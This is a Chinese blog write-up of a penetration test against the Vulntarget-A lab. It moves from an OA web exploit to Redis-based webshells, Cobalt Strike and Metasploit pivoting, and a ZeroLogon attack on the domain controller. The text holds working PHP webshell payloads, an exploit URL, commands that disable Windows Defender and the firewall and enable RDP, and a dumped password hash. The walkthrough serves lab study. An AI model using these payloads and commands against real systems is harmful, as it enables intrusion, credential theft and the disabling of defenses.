MENU

Vulntarget -a

November 3, 2022 • Read: 1007 • Penetration testing

前言

应该是开源的内网环境,大家可以找一下

外网打点

他甩了个ip给我:192.168.101.116

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,80,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 192.168.101.116

121322312312.png

80端口开着的,直接访问web服务
7G0QTGBCV`LN@K3YN}5OZRV.png

然后去找OA的历史漏洞:https://zhuanlan.zhihu.com/p/346513138
3)%74OCJWHR@G9743WBNEE.png

找到历史版本为11.3,然后找到历史漏洞:https://joner11234.github.io/article/bdd0a488.html
随便找了一个日志包含的漏洞,先访问这个目录:/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.acces s.log
DHWHGFTE~O)GYM4$~D%G3A.png

然后上马:
http://192.168.101.116/ispirit/interface/gateway.php?<;?php file_put_contents('/ispirit/interface/shell.php','<?php @eval($_POST[m1]);?>')?>
再日志进行包含时发现并不能解析
AA1KL}KPHL}DZAAN$Z(9%{F.png

哪再找一个历史漏洞看看:https://www.freebuf.com/vuls/257154.html
所以我们来试试:
9H~{C@ET0KV01KVEK73IT.png

然后使用这个cookie替换掉admin空密码的cookie就能进入后台了
RZBP4SA{XV%Y)W)Z9ZBE@Y9.png

然后就是进行文件上传了
U3N@RBRR08~WHN3CP.png

然后再进行文件包含之后发现不行,那就换函数来

<?php
$fp = fopen('m1.php', 'w');
$a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ20xJ10pOz8+");
fwrite($fp, $a);
fclose($fp);
?>

8H9W$7Q@C16N%2S(XORQZM.png

然后连接蚁剑
QRRPWY}V(G6}}@RADR)K6@J.png

其实之前的端口扫描,我们可以直接用永恒之蓝上线的,我只是想试一试OA的漏洞复现
然后就是基本的信息收集,打内网了

内网渗透

我们先看看有无杀软之类的
J(HPXPUZ6CK1S}5BDDTM1~W.png

无AV,system权限,双网卡,有内网
我们直接pwoershell上线CS
416G4Z8V5{ZO_1G%4$6IG.png

然后我们来实现另外一个网段机器的扫描
)91BS}X}MCXS)0$RCPBRC.png

而且是工作组环境
J1I7IXF60)(GW@5{Y2%03.png

扫描端口
7X`YKJP~04IP352V{TRNL~9.png

6379存在redis服务,首先想到的就是redis的未授权访问

redis横向win2016

我们先来搭建个内网穿透的代理
XWQ%8$3LWZHXB1L%I$(_C.png

然后修改一下proxychains4.conf的配置文件
HWR4Z~EQ(G}23KPD0(3K8.png

用redis-cli来试试,确实存在漏洞
S7~8V2NX}%})KLTY~(YHI.png

然后我们还需要网址的绝对路径才行,进行目录扫描
@OA76_F4CRTAWMFK)4G3M.png

发现存在l.php,这个是一个php探针
)5LO94(6RK8)$FLFQAU)9AJ.png

也有phpinfo.php,还有个室友打靶场留下的shell.php,我就不猜密码了
自己用redis未授权来写一个webshell
AJ4TVMN0LHHGELYZK.png

然后蚁剑挂代理连接
3I)7JMOG1Y~9Y@A5VLZMON.png

然后我们来让它中转上线,先设置中转监听
{LY)8M20SW`VOED{M@YHO$U.png

然后来生成后门,蚁剑上传
发现可以上传成功但是会被删除,怀疑有杀软,看看进程
_R%`8CI9}O8REZF{Q$J%KIQ.png

确实存在杀软,查了一下在蚁剑这么关闭

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD

关闭杀软了,我们再来试一下,发现还是上不了线,还会被删,所以自己去github找个免杀项目,这里就不提供了
没被杀了,然后还是不能上线,可能是防火墙的原因,我们来关闭防火墙
T(~1{4BO3IT2PBTC3CN)V.png

但是中转上线还是失败,试一试直接代理设置为监听
J_65TB~_4X$%KB@XB~M~KOX.png

然后再来上线试一试,发现还是不行,那就在试一试正向马
~AUI%4AT(J({N556AF{@}3.png

成功上线,发现有第二张网卡,然后我们来再信息收集一波
}IHX4O5@BZMSWEHCE3XB.png

先dumphash之后
8(MCKF$`4R4P09Q15K02YXS.png

得到Administrator/Admin@123
然后我想得到我们的Administrator权限,因为这里的system权限我感觉不是域用户,域内信息收集的时候报错
然后我用CS自带的远程桌面的时候我的客户端老是会断,所以我直接把第一个会话派生到msf中,换工具了
QYQ1S26AA}$92W15912.png

然后加路由
BB}NIO7G9ID72_PO~P2IS61.png

然后就是生成正向马了
USJEY_81ZPF9LDBI}}V$OE.png

然后通过我们外面的蚁剑来上传执行
msf设置监听,好像和之前的cs端口冲突了,所以来换个端口
TEYEQG5PFGB2P_W@8G(TYK.png

成功上线,挂个socks连接,尝试登录远程桌面
0YTJ1G%(X)162A%A(5NEO7J.png

换个工具remmina
AJK3ZSJ0VBSGF2PM6OX~W7D.png

然后用用Administrator权限执行我们的木马
F_X}FC76WD$1_BH5KXF3E1.png

成功拿到权限,但是发现进行域信息收集还是会报错,所以应该不是这个问题
先添加路由然后使用msf进行域信息搜集
VT%%$V@4BH8JM}7{HSUONEM.png

发现主域和域控ip,接下来就是横向域控了

CVE-2020-1472攻击域控

这一步我就没挨个去试了,因为前面浪费太多时间了,我就看了一眼wp
然后挂一个socks,下载CVE-2020-1472的exp
具体使用:https://www.cnblogs.com/xiaozi/p/13678055.html
先将其密码置空
F$`6~BA@K1G5GTEYDR25W{9.png

然后导出凭据
}Y1{QN9(41W%OP{AEE2OP.png

得到管理员的hash:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
使用administrator的hash横向连接
@@ME1YAA_0771Z$K%(S4V57.png

横向成功,拿到了域控的hash,我们尝试破解为Admin@666
又和之前一样我们来登录远程桌面,先开启3389端口,并且关闭防火墙

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

netsh advfirewall set allprofiles state off

然后使用remmina连接
CPHT$9_6M1~2~M)MDLHE69.png

然后上传我们的正向木马
7AK3(YS0JUM{{(41~PC6.png

同理上线CS
%B{NUML~@59VX58ANNC3.png

废话

完成了,睡觉,凌晨三点了

Last Modified: May 12, 2023
Archives Tip
QR Code for this page
Tipping QR Code
Leave a Comment

2 Comments
  1. 111 111

    师傅,域控怎么下载的正向木马啊?

    1. @111远程桌面可以访问第二台机器的web服务,懂了吗